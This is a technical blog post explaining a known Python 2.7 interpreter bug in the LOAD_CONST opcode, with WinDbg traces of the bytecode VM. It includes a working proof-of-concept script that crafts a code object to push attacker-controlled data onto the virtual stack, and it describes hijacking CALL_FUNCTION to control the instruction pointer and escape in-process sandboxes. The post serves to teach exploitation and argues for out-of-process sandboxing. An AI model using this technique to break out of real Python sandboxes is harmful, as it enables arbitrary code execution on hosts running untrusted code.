Deep Dive Into Python's VM: Story of LOAD_CONST Bug
Introduction
A year ago, I’ve written a Python script to leverage a bug in Python’s virtual machine: the idea was to fully control the Python virtual processor and after that to instrument the VM to execute native codes. The python27_abuse_vm_to_execute_x86_code.py script wasn’t really self-explanatory, so I believe only a few people actually took some time to understood what happened under the hood. The purpose of this post is to give you an explanation of the bug, how you can control the VM and how you can turn the bug into something that can be more useful. It’s also a cool occasion to see how works the Python virtual machine from a low-level perspective: what we love so much right?
But before going further, I just would like to clarify a couple of things:
I haven’t found this bug, this is quite old and known by the Python developers (trading safety for performance), so don’t panic this is not a 0day or a new bug ; can be a cool CTF trick though
Obviously, YES I know we can also “escape” the virtual machine with the ctypes module ; but this is a feature not a bug. In addition, ctypes is always “removed” from sandbox implementation in Python
Also, keep in mind I will focus Python 2.7.5 x86 on Windows ; but obviously this is adaptable for other systems and architectures, so this is left as an exercise to the interested readers.
All right, let’s move on to the first part: this one will focus the essentials about the VM, and Python objects.
The Python virtual processor
Introduction
As you know, Python is a (really cool) scripting language interpreted, and the source of the official interpreter is available here: Python-2.7.6.tgz. The project is written in C, and it is really readable ; so please download the sources, read them, you will learn a lot of things.
Now all the Python code you write is being compiled, at some point, into some “bytecodes”: let’s say it’s exactly the same when your C codes are compiled into x86 code. But the cool thing for us, is that the Python architecture is far more simpler than x86.
Here is a partial list of all available opcodes in Python 2.7.5:
The Python VM is fully implemented in the function PyEval_EvalFrameEx that you can find in the ceval.c file. The machine is built with a simple loop handling opcodes one-by-one with a bunch of switch-cases:
PyObject*PyEval_EvalFrameEx(PyFrameObject*f,intthrowflag){//...fast_next_opcode://.../* Extract opcode and argument */opcode=NEXTOP();oparg=0;if(HAS_ARG(opcode))oparg=NEXTARG();//...switch(opcode){caseNOP:
gotofast_next_opcode;caseLOAD_FAST:
x=GETLOCAL(oparg);if(x!=NULL){Py_INCREF(x);PUSH(x);gotofast_next_opcode;}format_exc_check_arg(PyExc_UnboundLocalError,UNBOUNDLOCAL_ERROR_MSG,PyTuple_GetItem(co->co_varnames,oparg));break;caseLOAD_CONST:
x=GETITEM(consts,oparg);Py_INCREF(x);PUSH(x);gotofast_next_opcode;caseSTORE_FAST:
v=POP();SETLOCAL(oparg,v);gotofast_next_opcode;//...}
The machine also uses a virtual stack to pass/return object to the different opcodes. So it really looks like an architecture we are used to dealing with, nothing exotic.
Everything is an object
The first rule of the VM is that it handles only Python objects. A Python object is basically made of two parts:
The first one is a header, this header is mandatory for all the objects. Defined like that:
Python object header
12345678
#define PyObject_HEAD \ _PyObject_HEAD_EXTRA \ Py_ssize_t ob_refcnt; \ struct _typeobject *ob_type;#define PyObject_VAR_HEAD \ PyObject_HEAD \ Py_ssize_t ob_size; /* Number of items in variable part */
The second one is the variable part that describes the specifics of your object. Here is for example PyStringObject:
PyStringObject
123456789101112131415
typedefstruct{PyObject_VAR_HEADlongob_shash;intob_sstate;charob_sval[1];/* Invariants: * ob_sval contains space for 'ob_size+1' elements. * ob_sval[ob_size] == 0. * ob_shash is the hash of the string or -1 if not computed yet. * ob_sstate != 0 iff the string object is in stringobject.c's * 'interned' dictionary; in this case the two references * from 'interned' to this object are *not counted* in ob_refcnt. */}PyStringObject;
Now, some of you may ask themselves “How does Python know the type of an object when it receives a pointer ?”. In fact, this is exactly the role of the field ob_type. Python exports a _typeobject static variable that describes the type of the object. Here is, for instance the PyString_Type:
Basically, every string objects will have their ob_type fields pointing to that PyString_Type variable. With this cute little trick, Python is able to do type checking like that:
With the previous tricks, and the PyObject type defined as follow, Python is able to handle in a generic-fashion the different objects:
PyObject
123
typedefstruct_object{PyObject_HEAD}PyObject;
So when you are in your debugger and you want to know what type of object it is, you can use that field to identify easily the type of the object you are dealing with:
Once you have done that, you can dump the variable part describing your object to extract the information you want.
By the way, all the native objects are implemented in the Objects/ directory.
Debugging session: stepping the VM. The hard way.
It’s time for us to go a little bit deeper, at the assembly level, where we belong ; so let’s define a dummy function like this one:
dummy function
12
defa(b,c):returnb+c
Now using the Python’s dis module, we can disassemble the function object a:
disassemble a
123456789101112131415
In [20]: dis.dis(a)
2 0 LOAD_FAST 0 (b)
3 LOAD_FAST 1 (c)
6 BINARY_ADD
7 RETURN_VALUE
In [21]: a.func_code.co_code
In [22]: print ''.join('\\x%.2x' % ord(i) for i in a.__code__.co_code)
\x7c\x00\x00\x7c\x01\x00\x17\x53
In [23]: opcode.opname[0x7c]
Out[23]: 'LOAD_FAST'
In [24]: opcode.opname[0x17]
Out[24]: 'BINARY_ADD'
In [25]: opcode.opname[0x53]
Out[25]: 'RETURN_VALUE'
Keep in mind, as we said earlier, that everything is an object ; so a function is an object, and bytecode is an object as well:
Time to attach my debugger to the interpreter to see what’s going on in that weird-machine, and to place a conditional breakpoint on PyEval_EvalFrameEx.
Once you did that, you can call the dummy function:
windbg breakpoint
1234567891011
0:000> bp python27!PyEval_EvalFrameEx+0x2b2 ".if(poi(ecx+4) == 0x53170001){}.else{g}"
breakpoint 0 redefined
0:000> g
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea914=7c
0:000> db ecx l8
025ea914 7c 00 00 7c 01 00 17 53 |..|...S
OK perfect, we are in the middle of the VM, and our function is being evaluated. The register ECX points to the bytecode being evaluated, and the first opcode is LOAD_FAST.
Basically, this opcode takes an object in the fastlocals array, and push it on the virtual stack. In our case, as we saw in both the disassembly and the bytecode dump, we are going to load the index 0 (the argument b), then the index 1 (argument c).
Here’s what it looks like in the debugger ; first step is to load the LOAD_FAST opcode:
fetching the LOAD_FAST opcode
123456
0:000>
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea914=7c
In ECX we have a pointer onto the opcodes of the function being evaluated, our dummy function. 0x7c is the value of the LOAD_FAST opcode as we can see:
LOAD_FAST
1
#define LOAD_FAST 124 /* Local variable number */
Then, the function needs to check if the opcode has argument or not, and that’s done by comparing the opcode with a constant value called HAVE_ARGUMENT:
Checking if the opcode has an argument
123456
0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec568 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b8:
1e0ec568 83f85a cmp eax,5Ah
Again, we can verify the value to be sure we understand what we are doing:
opcode.HAVE_ARGUMENT
12
In[11]:'%x'%opcode.HAVE_ARGUMENTOut[11]:'5a'
HAS_ARG
1
#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)
If the opcode has an argument, the function needs to retrieve it (it’s one byte):
Fetching the argument
123456
0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec571 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
python27!PyEval_EvalFrameEx+0x2c1:
1e0ec571 0fb67901 movzx edi,byte ptr [ecx+1] ds:002b:025ea916=00
As expected for the first LOAD_FAST the argument is 0x00, perfect.
After that the function dispatches the execution flow to the LOAD_FAST case defined as follow:
0:000>
eax=0000007c ebx=00000000 ecx=025ea91a edx=026bef98 esi=025eafc0 edi=00000001
eip=1e0ec562 esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea91a=17
Here it’s supposed to retrieve the two objects on the top-of-stack, and add them.
The C code looks like this:
BINARY_ADD
1234567891011121314151617181920212223
#define SET_TOP(v) (stack_pointer[-1] = (v))caseBINARY_ADD:
w=POP();v=TOP();if(PyInt_CheckExact(v)&&PyInt_CheckExact(w)){// Not our case}elseif(PyString_CheckExact(v)&&PyString_CheckExact(w)){x=string_concatenate(v,w,f,next_instr);/* string_concatenate consumed the ref to v */gotoskip_decref_vx;}else{// Not our case}Py_DECREF(v);skip_decref_vx:Py_DECREF(w);SET_TOP(x);if(x!=NULL)continue;break;
And here is the assembly version where it retrieves the two objects from the top-of-stack:
POP and TOP
12345678910111213141516171819
0:000>
eax=00000017 ebx=00000000 ecx=00000016 edx=0000000f esi=025eafc0 edi=00000000
eip=1e0eccf5 esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa45:
1e0eccf5 8b75f8 mov esi,dword ptr [ebp-8] ss:002b:026bf0d8=a0aa5e02
...
0:000>
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=00000000
eip=1e0eccfb esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa4b:
1e0eccfb 8b7dfc mov edi,dword ptr [ebp-4] ss:002b:026bf0dc=c0af5e02
0:000>
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=025eafc0
eip=1e0eccfe esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa4e:
1e0eccfe 83ed04 sub ebp,4
And the last part of the case is to push the resulting string onto the virtual stack (SET_TOP operation):
Push the resulting object onto the virtual stack
123456
0:000>
eax=025eaac0 ebx=025eaac0 ecx=00000005 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0ecb82 esp=0027fcd8 ebp=026bf0dc iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200213
python27!PyEval_EvalFrameEx+0x8d2:
1e0ecb82 895dfc mov dword ptr [ebp-4],ebx ss:002b:026bf0d8=a0aa5e02
Last part of our deep dive, the RETURN_VALUE opcode:
Fetching the RETURN_VALUE opcode
123456
0:000>
eax=025eaac0 ebx=025eafc0 ecx=025ea91b edx=026bef98 esi=025eaac0 edi=025eafc0
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea91b=53
All right, at least now you have a more precise idea about how that Python virtual machine works, and more importantly how you can directly debug it without symbols. Of course, you can download the debug symbols on Linux and use that information in gdb ; it should make your life easier (….but I hate gdb man…).
Note that I would love very much to have a debugger at the Python bytecode level, it would be much easier than instrumenting the interpreter. If you know one ping me! If you build one ping me too :–).
This may be a bit obscure for you, but keep in mind we control the index oparg and the content of consts. That means we can just push untrusted data on the virtual stack of the VM: brilliant. Getting a crash out of this bug is fairly easy, try to run these lines (on a Python 2.7 distribution):
(2058.2108): Access violation - code c0000005 (!!! second chance !!!)
[...]
eax=01cb1030 ebx=00000000 ecx=00000063 edx=00000046 esi=1e222c0c edi=beefdead
eip=1e0ec5f7 esp=0027e7f8 ebp=0273a9f0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
By the way, some readers might have caught the same type of bug in LOAD_FAST with the fastlocals array ; those readers are definitely right :).
Walking through the PoC
OK, so if you look only at the faulting instruction you could say that the bug is minor and we won’t be able to turn it into something “useful”. But the essential piece when you want to exploit a software is to actually completely understand how it works. Then you are more capable of turning bugs that seems useless into interesting primitives.
As we said several times, from Python code you can’t really push any value you want onto the Python virtual stack, obviously. The machine is only dealing with Python objects. However, with this bug we can corrupt the virtual stack by pushing arbitrary data that we control. If you do that well, you can end up causing the Python VM to call whatever address you want. That’s exactly what I did back when I wrote python27_abuse_vm_to_execute_x86_code.py.
In Python we are really lucky because we can control a lot of things in memory and we have natively a way to “leak” (I shouldn’t call that a leak though because it’s a feature) the address of a Python object with the function id. So basically we can do stuff, we can do it reliably and we can manage to not break the interpreter, like bosses.
Pushing attacker-controlled data on the virtual stack
We control oparg and the content of the tuple consts. We can also find out the address of that tuple. So we can have a Python string object that stores an arbitrary value, let’s say 0xdeadbeef and it will be pushed on the virtual stack.
importopcodeimporttypesimportstructdefpshort(s):returnstruct.pack('<H',s)defa():passconsts=()s='\xef\xbe\xad\xde'address_s=id(s)+20# 20 is the offset of the array of byte we control in the stringaddress_consts=id(consts)# python27!PyEval_EvalFrameEx+0x347:# 1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????offset=((address_s-address_consts-0xC)/4)&0xffffffffhigh=offset>>16low=offset&0xffffprint'Consts tuple @%#.8x'%address_constsprint'Address of controled data @%#.8x'%address_sprint'Offset between const and our object: @%#.8x'%offsetprint'Going to push [%#.8x] on the virtual stack'%(address_consts+(address_s-address_consts-0xC)+0xc)a.func_code=types.CodeType(0,0,0,0,chr(opcode.opmap['EXTENDED_ARG'])+pshort(high)+chr(opcode.opmap['LOAD_CONST'])+pshort(low),consts,(),(),'','',0,'')a()
..annnnd..
debugger view
1234567891011121314151617181920212223
D:\>python 1.py
Consts tuple @0x01db1030
Address of controled data @0x022a0654
Offset between const and our object: @0x0013bd86
Going to push [0x022a0654] on the virtual stack
*JIT debugger pops*
eax=01db1030 ebx=00000000 ecx=00000063 edx=00000046 esi=deadbeef edi=0013bd86
eip=1e0ec5fb esp=0027fc68 ebp=01e63fc0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
python27!PyEval_EvalFrameEx+0x34b:
1e0ec5fb ff06 inc dword ptr [esi] ds:002b:deadbeef=????????
0:000> ub eip l1
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch]
0:000> ? eax+edi*4+c
Evaluate expression: 36308564 = 022a0654
0:000> dd 022a0654 l1
022a0654 deadbeef <- the data we control in our PyStringObject
0:000> dps 022a0654-0n20 l2
022a0640 00000003
022a0644 1e226798 python27!PyString_Type
Perfect, we control a part of the virtual stack :).
Game over, LOAD_FUNCTION
Once you control the virtual stack, the only limit is your imagination and the ability you have to find an interesting spot in the virtual machine. My idea was to use the CALL_FUNCTION opcode to craft a PyFunctionObject somehow, push it onto the virtual stack and to use the magic opcode.
PyFunctionObject definition
123456789101112
typedefstruct{PyObject_HEADPyObject*func_code;/* A code object */PyObject*func_globals;/* A dictionary (other mappings won't do) */PyObject*func_defaults;/* NULL or a tuple */PyObject*func_closure;/* NULL or a tuple of cell objects */PyObject*func_doc;/* The __doc__ attribute, can be anything */PyObject*func_name;/* The __name__ attribute, a string object */PyObject*func_dict;/* The __dict__ attribute, a dict or NULL */PyObject*func_weakreflist;/* List of weak references */PyObject*func_module;/* The __module__ attribute, can be anything */}PyFunctionObject;
The thing is, as we saw earlier, the virtual machine usually ensures the type of the object it handles. If the type checking fails, the function bails out and we are not happy, at all. It means we would need an information-leak to obtain a pointer to the PyFunction_Type static variable.
Fortunately for us, the CALL_FUNCTION can still be abused without knowing that magic pointer to craft correctly our object. Let’s go over the source code to illustrate my sayings:
(11d0.11cc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Python\Python275\python27.dll -
eax=01cc1030 ebx=00000000 ecx=00422e78 edx=00000000 esi=deadbeef edi=02e62df4
eip=deadbeef esp=0027e78c ebp=02e62df4 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
deadbeef ?? ???
After reading this little post you are now aware that if you want to sandbox efficiently Python, you should do it outside of Python and not by preventing the use of some modules or things like that: this is broken by design. The virtual machine is not safe enough to build a strong sandbox inside Python, so don’t rely on such thing if you don’t want to get surprised. An article about that exact same thing was written here if you are interested: The failure of pysandbox.
You also may want to look at PyPy’s sandboxing capability if you are interested in executing untrusted Python code. Otherwise, you can build your own SECCOMP-based system :).
On the other hand, I had a lot of fun taking a deep dive into Python’s source code and I hope you had some too! If you would like to know more about the low level aspects of Python here are a list of interesting posts: